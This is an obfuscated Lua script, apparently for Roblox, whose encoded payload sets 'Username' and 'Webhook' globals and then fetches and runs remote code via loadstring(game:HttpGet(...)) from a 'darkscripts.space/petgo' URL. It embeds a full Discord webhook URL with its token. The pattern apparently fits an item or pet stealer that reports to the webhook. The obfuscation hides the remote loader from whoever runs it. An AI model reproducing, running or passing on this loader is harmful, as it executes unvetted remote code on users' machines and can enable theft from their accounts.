--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v86=v2(v0(v30,16));if v19 then local v110=v5(v86,v19);v19=nil;return v110;else return v86;end end end);local function v20(v31,v32,v33) if v33 then local v87=(v31/((5 -3)^(v32-(2 -1))))%(2^(((v33-((1 + 0) -(0 -0))) -(v32-(2 -1))) + 1 + 0)) ;return v87-(v87%1) ;else local v88=((1066 -(68 + 997)) + 1)^(v32-(878 -(282 + 595))) ;return (((v31%(v88 + v88))>=v88) and (620 -(555 + 64))) or (931 -(857 + 74)) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0;local v36;local v37;while true do if (v35==(1270 -(226 + 1044))) then v36,v37=v1(v16,v18,v18 + (8 -6) );v18=v18 + (119 -(32 + 85)) ;v35=2 -1 ;end if (v35==(1 -(350 -(87 + 263)))) then return (v37 * (251 + 5)) + v36 ;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (183 -(67 + 113)) );v18=v18 + 3 + 1 ;return (v41 * 16777216) + (v40 * ((639498 -478597) -(96317 -(802 + 150)))) + (v39 * (189 + 67)) + v38 ;end local function v24() local v42=0;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==((3 + 4) -4)) then if (v47==(0 -0)) then if (v46==(0 + 0)) then return v48 * (997 -(750 + 165 + 82)) ;else v47=2 -1 ;v45=(772 -(201 + 571)) + 0 ;end elseif (v47==2047) then return ((v46==(0 -0)) and (v48 * (1/((2325 -(116 + 1022)) -(1069 + (491 -373)))))) or (v48 * NaN) ;end return v8(v48,v47-(2320 -1297) ) * (v45 + (v46/((3 -1)^(10 + 42)))) ;end if (v42==(1 -0)) then v45=1 + 0 ;v46=(v20(v44,792 -(368 + 423) ,62 -42 ) * ((20 -(10 + 8))^((72 + 50) -90))) + v43 ;v42=444 -((1518 -1102) + (92 -66)) ;end if (v42==(6 -4)) then v47=v20(v44,10 + 11 ,31);v48=((v20(v44,56 -24 )==1) and  -(439 -(145 + 293))) or (431 -(44 + 386)) ;v42=3;end if (v42==(1486 -(998 + 488))) then v43=v23();v44=v23();v42=1;end end end local function v25(v49) local v50=859 -(814 + 45) ;local v51;local v52;while true do if (v50==(7 -4)) then return v6(v52);end if ((1 + 0)==v50) then v51=v3(v16,v18,(v18 + v49) -1 );v18=v18 + v49 ;v50=1 + 1 + 0 ;end if (v50==((3046 -2161) -(261 + (2371 -(760 + 987))))) then v51=nil;if  not v49 then local v117=0 -0 ;while true do if (((2993 -(1789 + 124)) -((1786 -(745 + 21)) + 60))==v117) then v49=v23();if (v49==(1423 -(630 + 793))) then return "";end break;end end end v50=3 -2 ;end if (v50==2) then v52={};for v111=4 -3 , #v51 do v52[v111]=v2(v1(v3(v51,v111,v111)));end v50=3;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return function(v89,v90,v91,v92,v93,v94,v95,v96) local v89=(function() return 0;end)();local v90=(function() return;end)();local v91=(function() return;end)();while true do if (v89== #",") then if (v90== #"\\") then v91=(function() return v92()~=0 ;end)();elseif (v90==2) then v91=(function() return v93();end)();elseif (v90== #"-19") then v91=(function() return v94();end)();end v95[v96]=(function() return v91;end)();break;end if (0~=v89) then else local v119=(function() return 0;end)();local v120=(function() return;end)();while true do if (v119~=(0 -0)) then else v120=(function() return 0;end)();while true do if (v120==1) then v89=(function() return  #"]";end)();break;end if (v120==(0 -0)) then v90=(function() return v92();end)();v91=(function() return nil;end)();v120=(function() return 1;end)();end end break;end end end end return v89,v90,v91,v92,v93,v94,v95,v96;end;end)();local v54=(function() return function(v97,v98,v99) local v100=(function() return 0 -0 ;end)();local v101=(function() return;end)();while true do if (v100==(867 -(550 + 317))) then v101=(function() return 0 -0 ;end)();while true do if (v101==(0 -0)) then v97[v98-#"<" ]=(function() return v99();end)();return v97,v98,v99;end end break;end end end;end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {v55,v56,nil,v57};end)();local v59=(function() return v23();end)();local v60=(function() return {};end)();for v68= #"/",v59 do FlatIdent_27957,Type,Cons,v21,v24,v25,v60,v68=(function() return v53(FlatIdent_27957,Type,Cons,v21,v24,v25,v60,v68);end)();end v58[ #"91("]=(function() return v21();end)();for v69= #"<",v23() do local v70=(function() return v21();end)();if (v20(v70, #"|", #" ")~=0) then else local v105=(function() return 285 -(134 + 151) ;end)();local v106=(function() return;end)();local v107=(function() return;end)();local v108=(function() return;end)();local v109=(function() return;end)();while true do if (v105==(1667 -(970 + 695))) then while true do if (v106== #"!") then local v124=(function() return 0 -0 ;end)();while true do if (v124==0) then v109=(function() return {v22(),v22(),nil,nil};end)();if (v107==(0 -0)) then local v174=(function() return 0 -0 ;end)();local v175=(function() return;end)();while true do if (v174==(0 -0)) then v175=(function() return 1824 -(1195 + 629) ;end)();while true do if (v175~=0) then else v109[ #"19("]=(function() return v22();end)();v109[ #"asd1"]=(function() return v22();end)();break;end end break;end end elseif (v107== #"{") then v109[ #"19("]=(function() return v23();end)();elseif (v107==(2 -0)) then v109[ #"xxx"]=(function() return v23() -(2^16) ;end)();elseif (v107== #"nil") then local v196=(function() return 0;end)();local v197=(function() return;end)();while true do if (v196==0) then v197=(function() return 0;end)();while true do if (0==v197) then v109[ #"-19"]=(function() return v23() -(2^(257 -(187 + 54))) ;end)();v109[ #"xnxx"]=(function() return v22();end)();break;end end break;end end end v124=(function() return 1;end)();end if (v124~=1) then else v106=(function() return 2;end)();break;end end end if (v106~=0) then else local v125=(function() return 780 -(162 + 618) ;end)();local v126=(function() return;end)();while true do if (v125==(0 + 0)) then v126=(function() return 0 + 0 ;end)();while true do if (v126==1) then v106=(function() return  #":";end)();break;end if (v126==0) then v107=(function() return v20(v70,2, #"asd");end)();v108=(function() return v20(v70, #"?id=",6);end)();v126=(function() return 1 -0 ;end)();end end break;end end end if (v106~= #"91(") then else if (v20(v108, #"asd", #"19(")== #"~") then v109[ #".dev"]=(function() return v60[v109[ #"0836"]];end)();end v55[v69]=(function() return v109;end)();break;end if (v106==(2 -0)) then local v128=(function() return 0;end)();local v129=(function() return;end)();while true do if (v128==(0 + 0)) then v129=(function() return 0;end)();while true do if (1~=v129) then else v106=(function() return  #"91(";end)();break;end if (v129~=(1636 -(1373 + 263))) then else if (v20(v108, #"/", #"}")~= #"|") then else v109[2]=(function() return v60[v109[2]];end)();end if (v20(v108,1002 -(451 + 549) ,1 + 1 )== #":") then v109[ #"asd"]=(function() return v60[v109[ #"xnx"]];end)();end v129=(function() return 1 -0 ;end)();end end break;end end end end break;end if (v105==1) then local v121=(function() return 0 -0 ;end)();while true do if (1==v121) then v105=(function() return 1386 -(746 + 638) ;end)();break;end if ((0 + 0)~=v121) then else v108=(function() return nil;end)();v109=(function() return nil;end)();v121=(function() return 1 -0 ;end)();end end end if (v105~=0) then else local v122=(function() return 0;end)();while true do if (v122~=(341 -(218 + 123))) then else v106=(function() return 0;end)();v107=(function() return nil;end)();v122=(function() return 1;end)();end if (v122~=1) then else v105=(function() return 1582 -(1535 + 46) ;end)();break;end end end end end end for v71= #"[",v23() do v56,v71,v28=(function() return v54(v56,v71,v28);end)();end return v58;end local function v29(v62,v63,v64) local v65=v62[1 + 0 ];local v66=v62[1 + 1 ];local v67=v62[563 -((833 -527) + 254) ];return function(...) local v72=v65;local v73=v66;local v74=v67;local v75=v27;local v76=1 + 0 ;local v77= -(1 -0);local v78={};local v79={...};local v80=v12("#",...) -1 ;local v81={};local v82={};for v102=0 + 0 ,v80 do if (v102>=v74) then v78[v102-v74 ]=v79[v102 + (2 -1) ];else v82[v102]=v79[v102 + ((1279 -675) -(268 + 335)) ];end end local v83=(v80-v74) + (291 -(60 + 230)) ;local v84;local v85;while true do v84=v72[v76];v85=v84[573 -(426 + 146) ];if (v85<=((4 -2) + 7)) then if (v85<=(1460 -(282 + 1174))) then if (v85<=1) then if ((3051>1005) and (v85==(0 -0))) then v82[v84[379 -(142 + 235) ]]=v84[814 -(569 + 242) ];else v64[v84[8 -5 ]]=v82[v84[1 + 0 + 1 ]];end elseif (v85<=(1026 -(706 + 318))) then v82[v84[979 -(553 + 424) ]]=v64[v84[5 -2 ]];elseif (v85==((2349 -1095) -(721 + 530))) then v76=v84[(3415 -2141) -(945 + 326) ];else local v155=0 -(1227 -(322 + 905)) ;local v156;local v157;while true do if (v155==(0 + 0)) then v156=v84[1 + 1 ];v157=v82[v84[(1314 -(602 + 9)) -(271 + (1618 -(449 + 740))) ]];v155=(873 -(826 + 46)) + 0 ;end if ((1485<=2904) and ((1 + (947 -(245 + 702)))==v155)) then v82[v156 + (2 -1) ]=v157;v82[v156]=v157[v84[1504 -(1408 + 92) ]];break;end end end elseif (v85<=(1092 -(461 + 625))) then if (v85>(1293 -((3137 -2144) + 295))) then local v136=0 + 0 ;local v137;local v138;while true do if (v136==(1171 -(418 + 753))) then v137=v84[1 + 1 ];v138=v82[v84[1332 -(797 + 532) ]];v136=1 + 0 ;end if (v136==(1 + 0)) then v82[v137 + 1 + 0 ]=v138;v82[v137]=v138[v84[2 + 2 ]];break;end end else v82[v84[531 -(406 + 123) ]]=v84[1772 -(1749 + 20) ];end elseif (v85<=(2 + 5)) then if (v82[v84[733 -(476 + 255) ]]==v84[1326 -(1249 + 24 + 49) ]) then v76=v76 + 1 + 0 ;else v76=v84[(1900 -(260 + 1638)) + 1 ];end elseif ((3693<=4382) and (v85>(1153 -((906 -(382 + 58)) + 679)))) then if (v82[v84[4 -2 ]]==v84[242 -(64 + 174) ]) then v76=v76 + (2 -1) ;else v76=v84[3 -0 ];end else local v159=1900 -(106 + (5754 -3960)) ;local v160;local v161;local v162;local v163;while true do if (v159==(0 + 0)) then v160=v84[1 + 1 ];v161,v162=v75(v82[v160](v13(v82,v160 + 1 ,v84[3 + 0 ])));v159=2 -1 ;end if ((4269==4269) and (v159==(2 -1))) then v77=(v162 + v160) -(115 -(4 + 110)) ;v163=584 -(57 + 527) ;v159=1429 -(41 + 1386) ;end if ((387<=2782) and (v159==(105 -(17 + 86)))) then for v187=v160,v77 do local v188=0 + 0 + 0 ;while true do if (v188==(0 + (0 -0))) then v163=v163 + (1 -0) ;v82[v187]=v161[v163];break;end end end break;end end end elseif ((v85<=((118 -78) -26)) or (3282>4100)) then if ((v85<=(177 -(122 + 44))) or (3580<2844)) then if (v85>(17 -7)) then local v141=1933 -(565 + 1368) ;local v142;local v143;local v144;local v145;while true do if (((0 -0)==v141) or (1899<=917)) then v142=v84[6 -4 ];v143,v144=v75(v82[v142](v13(v82,v142 + (1 -0) ,v84[3 + 0 ])));v141=1 + 0 ;end if ((89<4490) and ((1 -0)==v141)) then v77=(v144 + v142) -(1 -0) ;v145=65 -(30 + 35) ;v141=2 + 0 ;end if ((1259 -(1043 + (1419 -(902 + 303))))==v141) then for v177=v142,v77 do v145=v145 + ((5 -2) -2) ;v82[v177]=v143[v145];end break;end end else do return;end end elseif ((v85<=((2947 -1723) -(323 + 77 + 812))) or (4983<1808)) then local v146=v84[5 -3 ];v82[v146]=v82[v146](v13(v82,v146 + (581 -(361 + 219)) ,v77));elseif (v85>(333 -(53 + 267))) then v82[v84[(2817 -(1121 + 569)) -(936 + 189) ]]();else do return;end end elseif ((v85<=(4 + 12)) or (4312<=876)) then if (v85>15) then local v148=413 -(15 + 398) ;local v149;while true do if ((2232<=2596) and (3829>3769) and (v148==(982 -(18 + 964)))) then v149=v84[1140 -(782 + (570 -(22 + 192))) ];v82[v149]=v82[v149](v13(v82,v149 + (3 -2) ,v77));break;end end else v76=v84[7 -4 ];end elseif (v85<=(10 + 7)) then v82[v84[2 + 0 ]]=v64[v84[(1536 -(483 + 200)) -(20 + 830) ]];elseif (v85>(15 + 3)) then v64[v84[(1592 -(1404 + 59)) -((317 -201) + 10) ]]=v82[v84[6 -4 ]];else v82[v84[1 + 1 ]]();end v76=v76 + (739 -((728 -186) + 196)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0A3Q00028Q00026Q00F03F030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574031F3Q00682Q7470733A2Q2F6461726B736372697074732E73706163652F706574676F03083Q00557365726E616D65030D3Q00722Q30746B692Q644F6E546F7003073Q00576562682Q6F6B03793Q00682Q7470733A2Q2F646973636F72642E636F6D2F6170692F776562682Q6F6B732F313239362Q333530353138363432382Q3133382F30594859612D35345174714856706241346C65626E49627245433239507458496F55344F39554459747273616E4E2Q34694B7943584835642D36415A64764751344C336600143Q0012053Q00013Q0026073Q000B000100020004033Q000B0001001202000100033Q001202000200043Q002006000200020005001205000400064Q0008000200044Q000C00013Q00022Q000E0001000100010004033Q001300010026073Q0001000100010004033Q00010001001205000100083Q001201000100073Q0012050001000A3Q001201000100093Q0012053Q00023Q0004033Q000100012Q000A3Q00017Q00",v9(),...);
